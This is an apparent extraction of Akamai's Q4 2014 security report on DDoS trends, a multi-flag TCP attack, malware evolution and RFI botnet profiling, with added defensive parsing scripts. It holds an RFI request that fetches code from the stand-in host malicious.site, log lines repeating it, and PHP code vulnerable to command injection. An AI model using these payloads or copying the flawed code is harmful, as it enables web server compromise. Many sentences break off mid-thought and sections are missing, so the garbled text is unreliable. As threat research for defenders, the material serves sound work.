Akamai's [state of the internet] / security
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 1
ANALYSIS +
EMERGING TRENDS
A new attack vector using a Christmas tree packet generated one of the quarter's nine
largest attacks. It is described in the Attack Spotlight: Multiple TCP Flag DDoS
Attack in this report.
At a glance*: comparison with Q4 2013 and Q3 2014
Figure 1: While the number of multi-vector attacks has surged the past two quarters, the percentage of
multi-vector campaigns has continued to hover around the 50 percent mark
Malware is often used for DDoS botnet expansion. Malware trends (multiplatform
malware, operating system awareness and destructive malware) are described in
the malware section of this report. Also in this report is a new botnet analysis
technique that uses distinct code in payloads to map botnet activity, actors and
victim web applications.
The highest bandwidth attack in Q4 was 158 Gbps, generated by a multi-vector
volumetric attack that used a SYN flood, UDP fragment flood and a UDP flood.
Overall, average peak bandwidth increased 52 percent from a year ago but was 54
percent lower than the most recent quarter, as shown in Figure 2.
Figure 2: Average peak bandwidth has dropped since last quarter, but remains higher than it was a year ago
Figure 3: Average peak volume dropped significantly, due to the larger number of attacks this quarter, coupled with fewer mega-attacks
Figure 4: Akamai mitigated nine mega-attacks in Q4, down from 17 mega-attacks in Q3 2014
in the year: the ratio of volumetric attacks versus application-based DDoS attacks
was 9:1. These numbers repeated throughout 2014, as shown in Figure 6.
Attackers' preference for volumetric infrastructure-based attacks may be due to ease
of execution: Internet infrastructure is growing. Surging economies and millions of
Internet-enabled devices are being added worldwide, making new resources available
for exploitation, botnet building and DDoS attacks. Infrastructure-based attack
resources are plentiful.
attack vectors were SYN floods (17 percent), SSDP floods (15 percent), UDP fragment
(14 percent), UDP floods (11 percent) and DNS attacks (11 percent). Additionally,
NTP attacks accounted for 8 percent, CHARGEN for 5 percent, ICMP for 4 percent,
ACK floods for 3 percent and RESET flood for 1 percent.
1.1B / Application Layer DDoS Attacks* / The top application-layer vector was HTTP
GET floods at 8 percent of all attacks, most of which match known DDoS kits such
as Spike. Other application-layer attacks were used less than 2 percent of the time,
including HTTP POST (1 percent), HTTP PUSH (0.5 percent) and HTTP HEAD
(0.2 percent).*
Successful application-based attacks require a higher level of attack expertise,
because most DDoS mitigation technology can stop simple HTTP GET and
POST floods. When the requests are refined, randomized and encoded, however,
they may bypass typical mitigation technology.
1.1C / Comparison: Attack Vectors (Q4 2014, Q3 2014, Q4 2013) / A new DDoS
attack vector was introduced in Q4. In late November, XMAS-DDoS with Christmas
tree packets was first observed. It is featured in the Attack Spotlight of this report.
Also, Q4 marked a greater number of all types of infrastructure attacks, except for
ICMP floods, compared to last quarter and Q4 2013. This reflects an overall increase
in number of DDoS attacks.
SYN floods and SSDP reflection floods were used extensively, contributing to the
increase of infrastructure-based attacks. These two attack vectors contributed 17
percent (SYN) and 15 percent (SSDP) to total attacks, as shown in Figure 7. The use
of SYN floods remained consistent with Q3.
Figure 7: The popularity of attack vectors varies by quarter, but SYN floods and UDP floods remain
perennial favorites*
SSDP accounted for a significant 214 percent increase in number of attacks compared
to Q3. The SSDP protocol, which is used by UPnP devices, was a newly observed
attack vector in Q3 and has proven to be increasingly popular. It may not yet have
achieved its full potential. In Q3 2014, for example, an SSDP-only DDoS attack
generated 54 Gbps. This quarter, Akamai mitigated a significantly larger 106 Gbps
SSDP attack. SSDP attacks may prove difficult to eradicate, because in many cases
the attack sources are Internet-enabled homes around the world. Home users may lack
the expertise to prevent these devices from becoming unwilling participants in DDoS
attacks; they may not even know their devices are being abused as SSDP reflectors.
In contrast, NTP and DNS servers are more likely to be operated by IT staff able
to detect and mitigate the abuse. New domains are constantly being created for
DNS reflection attacks, and administrators of open DNS resolvers have sought to
mitigate their abuse. NTP reflection attacks have as a result generally produced
less powerful attacks over time. That said, many vulnerable NTP servers are still
available as NTP reflection sources, and one of the nine attacks greater than 100
Gbps in Q4 was fueled by NTP abuse.
The fact that NTP reflection marked an increase in attacks by 181 percent compared
to Q3 is an indicator of the larger number of DDoS attacks overall in Q4, even
though NTP attacks were generally less effective and less popular than in the past.
Malicious actors make use of every resource available to them, including NTP
servers. One source of NTP reflection attacks was DDoS-for-hire sites, where NTP
reflection was one of the more common attack vectors available to paying customers.
Overall, Q4's infrastructure-based attacks increased 58 percent compared to Q3 and
121 percent compared to the same quarter a year earlier. Application-layer attacks
increased 51 percent over Q3 and dropped 16 percent from a year ago.
Compared to a year ago, UDP fragment attacks increased 54 percent, and quarter-over-quarter they increased 58 percent. Many reflection-based floods such as DNS,
SNMP and SSDP generate packets larger than allowed by the typical maximum
transmission unit (MTU). Such packets (exceeding 1,500 bytes) are fragmented
before reaching the target edge network and must be mitigated separately.
Increasing use of reflection attacks accounts for the increase in UDP fragment
floods. The sample stream in Figure 8 shows a typical CHARGEN flood packet. The
packet contained 6,108 bytes of data and was split into five parts.
81  0.055162  X.X.X.X -> X.X.X.X  IPv4  1518  Fragmented IP protocol (proto=UDP 17, off=0, ID=458a)
82  0.055307  X.X.X.X -> X.X.X.X  IPv4  1518  Fragmented IP protocol (proto=UDP 17, off=1480, ID=458a)
85  0.055411  X.X.X.X -> X.X.X.X  IPv4  1518  Fragmented IP protocol (proto=UDP 17, off=2960, ID=458a)
86  0.055512  X.X.X.X -> X.X.X.X  IPv4  1518  Fragmented IP protocol (proto=UDP 17, off=4440, ID=458a)
87  0.055518  X.X.X.X -> X.X.X.X  UDP   234   Source port: 19  Destination port: 2020
Figure 8: A fragmented UDP payload, resulting from a single CHARGEN reflection reply
The packets do not arrive in order, and only the last packet has the port information,
as shown.
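The point that Figure 8 makes, that a port-based filter sees the UDP header in only one of the five frames, is easy to check mechanically. The following script is an added example and is not part of the report or of any Akamai tooling: it walks a tshark-style listing (a constructed copy of the Figure 8 frames), groups fragments by IP ID, reconstructs the datagram size, and labels the result when the source port belongs to a known reflection service. The 18-byte link-layer overhead is an assumption chosen so that the listing reconciles with the 6,108-byte figure in the text.

```python
import re

# Constructed sample modelled on the tshark listing in Figure 8: frame number,
# relative time, source -> destination, protocol, frame length, info column.
# Addresses are masked the way the report masks them.
SAMPLE_LISTING = """\
81 0.055162 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented IP protocol (proto=UDP 17, off=0, ID=458a)
82 0.055307 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented IP protocol (proto=UDP 17, off=1480, ID=458a)
85 0.055411 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented IP protocol (proto=UDP 17, off=2960, ID=458a)
86 0.055512 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented IP protocol (proto=UDP 17, off=4440, ID=458a)
87 0.055518 X.X.X.X -> X.X.X.X UDP 234 Source port: 19  Destination port: 2020
"""

# Assumed framing: 14-byte Ethernet header plus a 4-byte trailer/tag, which is
# what makes a 1518-byte frame carry a 1500-byte IP packet (1480 bytes of
# fragment data after the 20-byte IPv4 header). Adjust for other link layers.
L2_OVERHEAD = 18
IPV4_HDR = 20
UDP_HDR = 8

# UDP source ports of services the report names as reflection sources.
REFLECTION_SERVICES = {19: "CHARGEN", 53: "DNS", 123: "NTP", 161: "SNMP", 1900: "SSDP"}

FRAG_RE = re.compile(r"proto=(\w+) \d+, off=(\d+), ID=([0-9a-f]+)")
PORT_RE = re.compile(r"Source port: (\d+)\s+Destination port: (\d+)")


def reassemble(listing):
    """Group fragment frames by IP ID and attach the final frame's L4 header.

    tshark decodes the ports only on the frame that completes reassembly, so
    that frame is matched to the fragment group still open at that moment
    (one flow at a time, which is what this sample shows)."""
    open_groups = {}
    open_id = None
    datagrams = []
    for line in listing.splitlines():
        frame, _ts, src, _arrow, dst, _proto, length, info = line.split(None, 7)
        data_len = int(length) - L2_OVERHEAD - IPV4_HDR   # IP payload in this frame
        frag = FRAG_RE.search(info)
        if frag:
            ip_id = frag.group(3)
            g = open_groups.setdefault(ip_id, {"id": ip_id, "src": src, "dst": dst,
                                               "frames": [], "pieces": []})
            g["frames"].append(int(frame))
            g["pieces"].append((int(frag.group(2)), data_len))   # (offset, size)
            open_id = ip_id
            continue
        ports = PORT_RE.search(info)
        if ports and open_id is not None:
            g = open_groups.pop(open_id)
            open_id = None
            last_offset = max(off + size for off, size in g["pieces"])
            g["frames"].append(int(frame))
            g["pieces"].append((last_offset, data_len))
            g["src_port"], g["dst_port"] = int(ports.group(1)), int(ports.group(2))
            g["udp_data_bytes"] = sum(size for _, size in g["pieces"]) - UDP_HDR
            g["contiguous"] = _contiguous(g["pieces"])
            g["service"] = REFLECTION_SERVICES.get(g["src_port"])
            datagrams.append(g)
    return datagrams


def _contiguous(pieces):
    """True when the fragments tile the datagram with no gaps or overlaps."""
    expected = 0
    for off, size in sorted(pieces):
        if off != expected:
            return False
        expected = off + size
    return True


def describe(datagram):
    """Defender-side summary: a fragmented datagram whose *source* port is a
    reflection service is a reply the target never asked for, and only one of
    its frames carries the port numbers a port-based filter could act on."""
    n = len(datagram["frames"])
    if datagram["service"]:
        return (f"{datagram['service']} reflection reply, {datagram['udp_data_bytes']} bytes of "
                f"UDP data in {n} frames; ports visible in 1 of {n}")
    return f"fragmented UDP datagram, {datagram['udp_data_bytes']} bytes in {n} frames"


if __name__ == "__main__":
    for d in reassemble(SAMPLE_LISTING):
        print(d["id"], describe(d))
```

Run against the sample, the single datagram reconciles to 6,108 bytes of UDP data across five frames, which is why mitigation of reflection floods has to treat the port-less fragments separately from the one frame a 5-tuple filter can match.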
1.2 / Targeted Industries / The five most-attacked verticals in Q4 were gaming
(35 percent), software and technology (26 percent), Internet and telecom (11 percent),
media and entertainment (10 percent), and financial services (7 percent), as shown
in Figure 9.
Figure 9: The gaming industry bore the brunt of DDoS attacks in Q4, driven by a surge in attack activity at
the end of December
1.2A / Gaming Industry / Gaming remained the most targeted industry since
Q2 2014 and experienced a 2 percent increase this quarter. In Q4, attacks were
fueled by malicious actors seeking to gain media attention or notoriety from
peer groups, damage reputations and cause disruptions in gaming services.
Some of the largest console gaming networks were openly and extensively
attacked in December 2014, when more players were likely to be affected.
Another trend was the holding of networks hostage, where the owners were
asked to pay a small ransom to stop a DDoS attack. This industry received a
similar percentage of all SYN floods (36 percent), SSDP floods (35 percent), DNS
floods (35 percent), NTP floods (36 percent) and UDP fragmentation attacks
(37 percent). It received relatively fewer of all UDP floods (26 percent) and GET
floods (25 percent).
companies that provide solutions such as Software-as-a-Service (SaaS) and cloud-based technologies. This industry saw the sharpest climb in attack rates, up 7 percent
from last quarter to 26 percent of all attacks. It received a similar percentage of
all SYN floods (27 percent), SSDP floods (24 percent), UDP fragmentation attacks
(24 percent), UDP floods (25 percent), DNS floods (24 percent), GET floods
(26 percent) and NTP floods (25 percent).
1.2C / Internet + Telecom / The Internet and telecom industry includes companies
that offer Internet-related services such as ISPs and CDNs. Although the target of
only 11 percent of all attacks, which was an increase of 2 percent, this industry was
the target of a disproportionate 18 percent of all DNS flood attacks in Q4. It was also
hit by 11 percent of SSDP floods, 13 percent of UDP floods and 10 percent of UDP
fragmentation attacks.
1.2D / Media / The media industry saw the biggest change in percentage of attacks,
institutions such as banks and trading platforms. The financial industry saw a small
decline (-2 percent) to 7 percent of all DDoS attacks. This industry received a similar
percentage of all attacks including SYN floods (8 percent), UDP fragmentation
attacks (9 percent) and DNS floods (10 percent).
1.3 / Top 10 Source Countries / The United States continued as the most
Figure 10: The US and China accounted for almost 50 percent of attack traffic in Q4 2014
The United States and China placed consistently in the top spots for DDoS sources
in Q4 2014, Q3 2014 and Q4 a year ago. Combined, they sourced 40 to 50 percent
of attacks. The United States placed first in Q4 2013 at 24 percent, first in Q3 of 2014
with 24 percent and first in Q4 2014 with 32 percent, as shown in Figure 11.
China has placed second in all three quarters as well with Q4 2013 (19 percent),
Q3 2014 (20 percent) and Q4 2014 (18 percent).
India and Korea appeared consistently in the top 10 source countries in each of
the three quarters. India ranged from sixth place in Q4 2013 (7 percent), ninth in
Q3 2014 (3 percent) and sixth in Q4 2014 (4 percent). Korea placed fifth in
Q4 2013 (7 percent), fifth in Q3 2014 (6 percent) and ninth in Q4 2014 (4 percent).
Other countries appeared on the list in the past but did not appear more recently.
The United Kingdom did not appear in the top ten source countries last quarter,
but it was fourth in Q4 2013 (8 percent) and eighth in Q4 2014 (4 percent).
Thailand placed third a year ago (14 percent) and tenth in Q3 2014 (3 percent)
but not in Q4 2014. Brazil placed ninth in Q4 a year ago (5 percent) and third in
Q3 2014, but stayed off the list in Q4 2014.
Mexico appeared recently in fourth place in Q3 2014 (14 percent) and in fourth
place in Q4 (12 percent). Similarly, Russia did not appear in Q4 a year ago but placed
eighth in Q3 2014 (3 percent) and tenth in Q4 2014 (4 percent). Germany also did
not appear in Q4 a year ago, but placed sixth in Q3 2014 (6 percent) and third in
Q4 2014 (12 percent).
Other countries with single appearances in the chart in the selected quarters include
Turkey in Q4 2013 (6 percent), Italy in Q4 2013 (6 percent), France in Q4 2014
(8 percent), and Spain in Q4 2014. Japan only appeared in Q3 2014 (4 percent).
In contrast to Q3 when there was a notable presence of BRIC countries, Q4 attack
sources were dominated by the United States, China and Western Europe.
Figure 11: The US and China consistently make the top 10 list of attack source IPs
1.4 / Total Attacks per Week (Q4 2014 vs. Q4 2013) / Figure 12 shows the percentage
increase and decrease of the total number of attacks per week in Q4 year-over-year. Of the three months of the quarter, Akamai mitigated the greatest number of
DDoS attacks in December. The last two weeks were the busiest with the last week
posting a 1,100 percent increase over the same week a year ago. The boost in activity
in Q4 was attributed to attacks against the gaming industry.
Figure 12: Weekly DDoS attacks surged in December 2014 compared to December 2013, fueled by attacks
in the gaming industry
1.5 / Comparison: Attack Campaign Start Times (Q4 2014, Q3 2014, Q4 2013) /
Last quarter PLXsert observed that the start times for attacks were becoming more
uniformly spread across a 24-hour period, an observation that led to the hypothesis:
As targets in previously underrepresented geographic locations increase in value and
foreign tech markets continue to grow, attack [start] times are likely to become more
evenly distributed. In fact, the same spreading trend continued in Q4. PLXsert
measured an uptick in attack targets in Asia, Western Europe and South America and
observed an increase in cybersecurity and DDoS-associated technology spending
in China, Germany, France, Spain, India and Korea. The diffusion of attack start
times will likely continue.
A widening scope of targets and the proliferation of attacks across industries and
geographies correlates with the spreading of attack distribution data across a 24-hour
period. Attacks were spread out over more hours and had a smaller range
between the maximum and minimum number of attacks per hour, as shown in
Figure 13. In the past, attack traffic varied more throughout the day, as shown by the
Q4 2013 data.
Figure 13: Attack traffic varied more throughout the day a year ago than in the two most recent quarters.
In the figure, the most recent quarter exemplifies this range reduction. In Q4 2014,
for example, the lowest percentage of total attacks (2 percent) occurred at hour 16:00,
while the highest percentage (5 percent) occurred at hour 19:00, a 3 percent difference.
In contrast, the range of the previous quarter was 4 percent. The least popular hour
of attack, 16:00, had 2 percent of total attacks, and the most popular hour of attack,
00:00, had 6 percent.
Likewise, Q4 a year ago had a range of almost 8 percent with the least popular
hour of attack, 05:00, at 0.5 percent of attacks, and the most popular hour,
20:00, at 8 percent.
[ SECTION ] 2
ATTACK SPOTLIGHT
Multiple TCP Flags
DDoS Attack
it indicates the ongoing development of DDoS attack tools. Although it was not a
record-breaking attack, it was large, peaking at 131 Gigabits per second (Gbps) and
44 Million packets per second (Mpps), a level that would slow or cause an outage
in most corporate infrastructures. The attacks occurred in August and again in
December.
2.1 / SYN with a Side of Everything / The TCP-based attack was packed with
TCP flags. One packet exhibited the greatest number of simultaneous flags set of all
the packets; only the ACK flag was missing. The flags are shown within brackets in
the tcpdump output in Figure 14. In the order in which they appear [FSRPUEW],
the flags included FIN, SYN, RST, PSH, URG, ECN, and CWR. Such a flag-filled
packet is commonly called a Christmas tree packet. Such packets are almost always
suspicious. They are designed to take more processing power than usual packets
and thus are commonly used in denial of service attacks. They may also be used for
reconnaissance to see how a target responds.
23:56:52.391222 IP 223.85.88.158.46642 > X.X.X.165.165: Flags [FSRPUEW], seq 3923992143:3923992144, win 24051, urg 0, length 1
Figure 14: This notable packet had the most flags set during this DDoS campaign
Although the attack seems to be executed like a SYN flood, there are some
differences that may indicate the use of a new attack tool. The resulting payloads
can be simulated closely using applications such as Scapy and hping (Linux).
Figure 15 simulates the live DDoS packet in Figure 14.
10:28:58.987897 IP 10.0.20.15.2215 > 192.168.20.62.62: Flags [FSRPUEW], seq 1141824621:1141824622, win 24051, urg 0, length 1
Figure 15: A lab reproduction of the packet using hping
In Figure 16, the Reset cause field is populated in TCP packets where the Reset flag
is set and with a length greater than 1. Using hping, similar results can be generated
in a lab environment as shown in the reproduction in Figure 17.
00:24:00.121872 IP 10.0.20.15.30312 > 192.168.20.62.443: Flags [SRP.E], seq 1647155852:1647155913, ack 1674304533, win 50599, length 61
00:24:00.121932 IP 10.0.20.15.30313 > 192.168.20.62.443: Flags [SRP.E], seq 1276518082:1276518143, ack 948855161, win 50599, length 61
00:25:00.975537 IP (tos 0x0, ttl 64, id 36810, offset 0, flags [none], proto TCP (6), length 101)
    10.0.20.15.25416 > 192.168.20.62.443: Flags [SRP.E], cksum 0xd610 (incorrect -> 0x8345), seq 1218010765:1218010826, ack 234896243, win 50599, length 61 [RST+ \0xb0\0x04\0x08\0x07\0x08\0x00\0x00(\0xb0\0x04\0x08\0x07\0x09\0x00\0x00,\0xb0\0x04\0x08\0x07\0x0a\0x00\0x000\0xb0\0x04\0x08\0x07\0x0b\0x00]
Figure 17: An hping reproduction in the lab with extra data showing as Reset cause
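Flag combinations like the [FSRPUEW] and [SRP.E] packets in Figures 14 through 17 never occur in a legitimate TCP conversation, which makes them a reliable thing to alert on in packet captures. The script below is an added example written for this report rather than code from Akamai or PLXsert: it parses tcpdump output (constructed lines carrying the same flag sets as the figures, plus an ordinary SYN and data segment for contrast) and reports which rule each packet violates. The rules encode TCP semantics (SYN never travels with FIN or RST; FIN, PSH and URG need an accompanying ACK) plus a flag-count threshold for Christmas tree packets; the threshold of five is an assumption.

```python
import re

# Constructed tcpdump lines. The first carries the flag set of Figure 14 with the
# report's masked target; the second mirrors the [SRP.E] packets of Figure 17;
# the last two are an ordinary handshake SYN and data segment for contrast.
SAMPLE_TCPDUMP = """\
23:56:52.391222 IP 223.85.88.158.46642 > X.X.X.165.165: Flags [FSRPUEW], seq 3923992143:3923992144, win 24051, urg 0, length 1
00:24:00.121872 IP 10.0.20.15.30312 > 192.168.20.62.443: Flags [SRP.E], seq 1647155852:1647155913, ack 1674304533, win 50599, length 61
12:00:00.000001 IP 203.0.113.7.51000 > 198.51.100.9.443: Flags [S], seq 1, win 65535, length 0
12:00:00.000200 IP 203.0.113.7.51000 > 198.51.100.9.443: Flags [P.], seq 1:101, ack 1, win 65535, length 100
"""

# tcpdump's single-letter flag notation ('.' is ACK; E is ECN-Echo, W is CWR).
FLAG_NAMES = {"F": "FIN", "S": "SYN", "R": "RST", "P": "PSH", ".": "ACK",
              "U": "URG", "E": "ECE", "W": "CWR"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+)\.(?P<sport>\d+) > (?P<dst>\S+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]*)\]")


def parse_line(line):
    """Split one tcpdump line into endpoints and the set of flag letters."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["flags"] = set(rec["flags"])
    return rec


def judge(flags):
    """Reasons a TCP flag set should never occur in legitimate traffic."""
    reasons = []
    if not flags:
        reasons.append("null packet (no flags)")
    if {"S", "F"} <= flags:
        reasons.append("SYN+FIN")
    if {"S", "R"} <= flags:
        reasons.append("SYN+RST")
    if "." not in flags and flags & {"F", "P", "U"}:
        reasons.append("FIN/PSH/URG without ACK")
    # Assumed threshold: five or more flags, or the FIN+PSH+URG trio, is a
    # Christmas tree packet.
    if len(flags) >= 5 or {"F", "P", "U"} <= flags:
        reasons.append(f"christmas tree ({len(flags)} flags)")
    return reasons


def scan(text):
    """Annotate each tcpdump line with the flag names and the rule hits."""
    out = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rec["flag_names"] = [FLAG_NAMES[f] for f in "FSRP.UEW" if f in rec["flags"]]
        rec["reasons"] = judge(rec["flags"])
        out.append(rec)
    return out


if __name__ == "__main__":
    for rec in scan(SAMPLE_TCPDUMP):
        verdict = "; ".join(rec["reasons"]) or "ok"
        print(f"{rec['src']}:{rec['sport']} -> {rec['dst']}:{rec['dport']} "
              f"[{'+'.join(rec['flag_names'])}] {verdict}")
```

On the sample, the Figure 14 packet trips four rules and the [SRP.E] packet two, while the handshake SYN and the data segment pass clean; counting rule hits per source over a short window turns this into a rate signal for the kind of campaign the spotlight describes.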
Some of the aspects that make this attack unique also make it less effective.
For example, some of the TCP flag combinations do not even render a response
from the target. Regardless, the attack achieved its goal by generating high traffic
volumes and high packet rates, as shown in Figure 18. This is enough traffic to hinder
or completely clog most corporate infrastructures, and it highlights the ongoing
development of DDoS tools.
This particular attack appears to be a calling card of sorts for a group claiming to
be Lizard Squad. Each attack against this particular Akamai customer revealed the
same use of multiple TCP flags in each packet. The initial campaign in August,
although mixed with a UDP flood, contained similar characteristics while also
containing some differences that may indicate a new group of attackers.
2.2 / Attack Attribution / Figure 19 depicts attack dates for three attack campaigns
that used the multiple-flag DDoS attack. This flag combination has only been
observed in attacks against one Akamai customer.
Figure 19: Attack Timeline
Although Lizard Squad claimed responsibility for the attacks, differences in the third
attack campaign invite speculation about a new attacker. The first two attack campaigns
targeted two specific web server IP addresses, which could easily be determined by
resolving the target website IP address. In addition, the first two attack campaigns,
despite including an extra attack vector, did not produce even half of the volume of
the third attack campaign.
Although the first two attacks included a UDP flood, as shown in Figure 20, the third
campaign did not make use of the UDP flood attack vector and it was a much larger
attack. The third campaign also targeted random hosts in a specific /24 network and
made use of the extra data in the Reset cause field on the packets with the Reset flag set.
Although there are similar footprints in all three campaigns, the expansion and
sophistication of the third campaign suggests this group has been incorporating
new resources from the DDoS-for-hire underground. These resources have
helped them produce greater volumes of attack traffic in comparison with their
previous campaigns.
The group used social media to amplify its claims of successful attacks,
garnering attention. The attacks were successfully mitigated by Akamai and were not
record-setting.
[ SECTION ] 3
CASE STUDY
The Evolution of
Malware: From
Cross Platform to
Destruction
Malware distribution has evolved through the years from the first
worms transferred via diskettes (Elk Cloner) to sophisticated viruses
spread across USB interfaces (Conficker). As new types of malicious
software were developed, the term malware was introduced to describe a broad
category that included Trojans, viruses, worms and more.
Innovative attack tactics and techniques have proliferated over the years as defenders
of computing systems have become more aware of the tricks malware developers
use to infect systems. Malware authors, in turn, have developed new infection
approaches for new operating systems and now look for ways to widen their nets
further to infect not just one type of machine at a time, but multiple operating
systems at once.
3.1 / Malware Classification / Malicious software can be classified by its features
a threat advisory in September 2014 about the IptabLes and IptabLex DDoS threat
targeting Linux platforms. It was propagated by targeting vulnerabilities in web
services such as Apache Struts, Tomcat and ElasticSearch. Soon after the advisory
was released, a malware variant written for Windows made its way into the public
space. While the Windows variant did not have the same impact as the Linux
variant, it became clear that the authors were creating variations of the threat to
target multiple operating systems.
Although little information has been collected about the methods used to propagate
the Windows variant of IptabLes, the motive of the malware writers is clear. A
rewrite or recompilation of the malware was likely required in order to produce
a Windows-compatible version, and string artifacts present in the binary indicate
strongly that the malware was repurposed to infect Windows machines.
Figure 21 shows some of the string data present in the Windows version of IptabLex.
Figure 22 shows similar string data from within the original Linux payload.
Matching strings, such as targeted domains used for DNS resolution and web
requests, can be observed when comparing these two variants.
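The comparison the text draws between Figures 21 and 22, matching string artifacts across the Linux and Windows builds, is the kind of triage that can be scripted. The block below is an added example, not code from the report and not based on the real IptabLes/IptabLex binaries (the figures are screenshots and the report does not print the domains). It runs a strings-style extraction over two constructed byte blobs that stand in for the two variants, reports what they share, bucketed into HTTP request fragments, bare hostnames and everything else, and gives a Jaccard overlap as a quick same-family score. `c2.example.invalid` is a placeholder name, not an indicator.

```python
import re

# Two constructed byte blobs standing in for the Linux and Windows variants.
# Only the three strings that appear in both are meant to model the "matching
# strings" the text describes; the rest are platform-specific filler.
LINUX_SAMPLE = (
    b"\x7fELF\x02\x01\x01\x00\x00\x00\x00\x00"
    b"libc.so.6\x00/etc/rc.d/init.d/\x00c2.example.invalid\x00"
    b"GET /cmd.php HTTP/1.1\x00User-Agent: Mozilla/4.0 (compatible)\x00"
)
WINDOWS_SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"
    b"KERNEL32.dll\x00WSAStartup\x00c2.example.invalid\x00"
    b"GET /cmd.php HTTP/1.1\x00User-Agent: Mozilla/4.0 (compatible)\x00"
)

HOSTNAME_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")


def extract_strings(blob, min_len=6):
    """Printable ASCII runs of at least min_len bytes, like the Unix strings tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return {m.group().decode("ascii") for m in re.finditer(pattern, blob)}


def shared_artifacts(blob_a, blob_b, min_len=6):
    """Strings present in both samples, bucketed the way an analyst pivots on
    them: HTTP request fragments, bare hostnames, and everything else."""
    common = extract_strings(blob_a, min_len) & extract_strings(blob_b, min_len)
    buckets = {"http": set(), "hostnames": set(), "other": set()}
    for s in common:
        if "HTTP/" in s or s.lower().startswith(("http://", "https://")):
            buckets["http"].add(s)
        elif HOSTNAME_RE.fullmatch(s.lower()):
            buckets["hostnames"].add(s)
        else:
            buckets["other"].add(s)
    return buckets


def overlap_ratio(blob_a, blob_b, min_len=6):
    """Jaccard similarity of the two string sets: a quick triage number for
    'same family, recompiled' versus 'unrelated'."""
    a, b = extract_strings(blob_a, min_len), extract_strings(blob_b, min_len)
    return len(a & b) / len(a | b) if a | b else 0.0


if __name__ == "__main__":
    for bucket, items in shared_artifacts(LINUX_SAMPLE, WINDOWS_SAMPLE).items():
        print(bucket, sorted(items))
    print("overlap", round(overlap_ratio(LINUX_SAMPLE, WINDOWS_SAMPLE), 3))
```

The hostnames and request fragments that survive the recompilation are the artifacts worth turning into network detections, since they are what the operator had to keep for the Windows build to talk to the same infrastructure.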
The IptabLes threat was successful due to the abuse of vulnerabilities of popular
web services usually running on Linux servers. Malicious actors typically use the
route of least resistance to quickly build a botnet of considerable size. These botnets
are then used in campaigns or sold in an underground market called DDoS-for-hire services.
3.5 / A RAT That Is Operating System Aware / In October 2012, Mac
stealing Minecraft passwords.
that include surveillance, infiltration and persistence. One of the first actions usually
taken after a successful infiltration is to establish persistence on the victim system.
In the case of a campaign carried out by DarkSeoul, a group responsible for a string
Figure 26: This code extracts the embedded malware during runtime
One of the embedded payloads was designed to find hard disks and
partitions on the infected system and overwrite the entire drive, effectively
deleting all of its content. Figure 27 shows some strings found in the DLL payload
designed to wipe an entire hard drive.
It replaces the contents with the data represented by the string PRINCPES as shown
by the API calls in Figure 28. It then subsequently attempts to find the next drive
and partition on the victim system.
Figure 28: A runtime analysis of API calls to overwrite hard disk data
The amount of damage that can be caused by such a virus is massive, and malicious
actors are only getting more motivated and sophisticated in their efforts. Recent
campaigns described by Symantec reveal how data exfiltration and stealth are an
important aspect of cyber warfare. The destruction of evidence is made possible by
payloads such as the DarkSeoul group payloads above.
3.7 / Conclusion / The use of malware as tools of the trade by malicious actors is
here to stay. Malware has evolved new features and adapted in response to security
measures. The antivirus industry reacts to new threats by providing signatures of
known malware. However, malicious actors have adapted their methods to bypass
these defenses and developed new tools and exploits to further their campaigns.
Some malware campaigns are destructive, making malware even more malicious.
Some may even jeopardize business and organizational continuity.
[ SECTION ] 4
BOTNET PROFILING
TECHNIQUE
Akamai has profiled multiple web application attack botnets using a new
analysis technique that takes advantage of data gleaned from the Akamai
Intelligent Platform. The identified botnets were set up to automate the
discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS
Command Injection attacks. Akamai researchers profiled the botnets by identifying
malicious code resource URLs and payloads that were identical among seemingly
unrelated attacks. An attack payload was used to aggregate data and map botnet
activity, actors and victim web applications.
This technique could be applied to other types of attacks that use a distinct payload,
such as one associated with a specific third-party domain or a common code snippet.
The analysis can be conducted without being part of the botnet or taking over the
botnet's command-and-control (C&C, C2) server.
The botnet profiled here has attacked targets around the world from geographically
dispersed sources. Once the botnet controls a machine, it is capable of remote shell
command execution and remote file upload, as well as Short Message Service (SMS)
and Internet Relay Chat (IRC) communication.
4.1 / About Remote File Inclusion Attacks / A remote file inclusion attack
In this code, the developer receives a module name from a user-submitted query
string parameter called module_name. The developer then uses this input (assuming
it is a directory name) inside a call to the PHP include() function. A malicious
hacker may exploit this vulnerability to include a remote piece of code, as shown in
Figure 30.
GET /page.php?module_name=http://www.malicious.site/bad.php?
Figure 30: Malicious actors transform the PHP include function into a query
<?php
// Figure 31 as printed in the report: the user-controlled cmd parameter is
// concatenated into a shell command line and executed without validation.
if (isset($_GET['cmd']))
{
    $cmd = 'LicenseChecker.exe ' . $_GET['cmd'];
    passthru($cmd);
}
?>
Figure 31: Code vulnerable to an OS command injection attack
Exposures (CVE) database and other vulnerability databases, such as The Exploit
Database, remote file inclusion and OS command injection vulnerabilities are
among the most prevalent vulnerabilities reported and exist in many modern web
applications and web frameworks.
The frequency with which these vulnerabilities are present and their ability to grant
full control over the victim web server make them the most favorable attack vectors
for malicious actors. In recent months, Akamai has observed massively orchestrated
attempts to find such vulnerabilities in an automated manner using specially
tailored botnets.
A malicious actor or group will usually write a piece of code to scan for RFI or
command injection vulnerabilities, sending a unique malicious payload inside a
parameter value. This malicious payload will usually point to a remote web server
owned or controlled by the hacker, which includes the PHP code to be included or
fetched. Attackers may use a botnet (a distributed network of machines running the
same piece of scanning code) to speed up the scanning process.
10.1.1.1      http://www.victim1.site/page.php?module_name=http://www.malicious.site/bad.php
192.168.1.1   http://www.victim2.site/index.php?inc_path=http://www.malicious.site/bad.php
The similarities indicate a botnet of machines performing the same task for the
same master.
Figure 32 illustrates two RFI attacks targeting two different web applications and
coming from two different attackers but pointing to the same remote malicious
piece of code.
Figure 32: Different attackers using the same remote malicious code
